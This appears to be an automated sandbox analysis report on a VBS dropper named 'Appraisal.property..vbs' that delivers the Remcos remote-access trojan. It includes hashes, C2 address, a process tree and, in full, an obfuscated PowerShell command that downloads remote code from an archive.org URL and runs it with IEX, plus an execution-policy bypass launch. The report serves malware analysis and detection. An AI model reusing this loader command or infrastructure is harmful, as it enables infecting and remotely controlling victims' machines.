Analysis
-
max time kernel
149s -
max time network
144s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
29-04-2021 11:05
Static task
static1
Behavioral task
behavioral1
Sample
Appraisal.property..vbs
Resource
win7v20210410
General
-
Target
Appraisal.property..vbs
-
Size
704B
-
MD5
7058bdc13d0094b435eaa07b09e76297
-
SHA1
f9084f4c4f1756fd531007a8fd7a344207a4cd13
-
SHA256
a465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200
-
SHA512
1b0bfd576cfae09c9d997ea8a93fa07e9b353cd68076d6665d21a6b46940126593d3eeb78331375a64a94e0b332581e1a4207e9217b5bf142c1798ddf7a12ed7
Malware Config
Extracted
https://ia601403.us.archive.org/35/items/all_20210429/ALL.TXT
Extracted
remcos
185.19.85.168:1723
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 6 4052 powershell.exe 17 4052 powershell.exe 19 4052 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3928 set thread context of 3960 3928 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4052 powershell.exe Token: SeDebugPrivilege 3928 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
aspnet_compiler.exepid process 3960 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 636 wrote to memory of 4052 636 WScript.exe powershell.exe PID 636 wrote to memory of 4052 636 WScript.exe powershell.exe PID 4052 wrote to memory of 3928 4052 powershell.exe powershell.exe PID 4052 wrote to memory of 3928 4052 powershell.exe powershell.exe PID 3928 wrote to memory of 3960 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 3960 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 3960 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 3960 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 3960 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 3960 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 3960 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 3960 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 3960 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 3960 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 3960 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 3960 3928 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Appraisal.property..vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://ia601403.us.archive.org/35/items/all_20210429/ALL.TXT';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd4⤵
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\ Microsoft.ps1MD5
8f6332bbb2ac7fd6aca48c0a7c389e99
SHA1f0158d25c9e29ef3769f4c5f6b23e08d836628b0
SHA256ad6b1343724f61fc76f17b844d53df5b5599b1b93c3709d7a2061c52ea46c9f2
SHA5125cc1a3c86976b0f4e88ca568f60f22241225b6a31a6f48f26a76bd84e9723541537c13f745745becca24f47f7a8e354dda948d30f521df5c842e56443fced8eb
-
memory/3928-143-0x000002748AFA3000-0x000002748AFA5000-memory.dmpFilesize
8KB
-
memory/3928-185-0x000002748AFA6000-0x000002748AFA8000-memory.dmpFilesize
8KB
-
memory/3928-184-0x00000274A4F10000-0x00000274A4F11000-memory.dmpFilesize
4KB
-
memory/3928-177-0x00000274A4EF0000-0x00000274A4F0F000-memory.dmpFilesize
124KB
-
memory/3928-160-0x00000274A4F20000-0x00000274A4F21000-memory.dmpFilesize
4KB
-
memory/3928-135-0x0000000000000000-mapping.dmp
-
memory/3928-142-0x000002748AFA0000-0x000002748AFA2000-memory.dmpFilesize
8KB
-
memory/3960-182-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/3960-183-0x000000000042EEEF-mapping.dmp
-
memory/3960-186-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/4052-130-0x000001F06F6A6000-0x000001F06F6A8000-memory.dmpFilesize
8KB
-
memory/4052-129-0x000001F06F6A3000-0x000001F06F6A5000-memory.dmpFilesize
8KB
-
memory/4052-128-0x000001F06F6A0000-0x000001F06F6A2000-memory.dmpFilesize
8KB
-
memory/4052-114-0x0000000000000000-mapping.dmp
-
memory/4052-123-0x000001F06F5C0000-0x000001F06F5C1000-memory.dmpFilesize
4KB
-
memory/4052-119-0x000001F06F0A0000-0x000001F06F0A1000-memory.dmpFilesize
4KB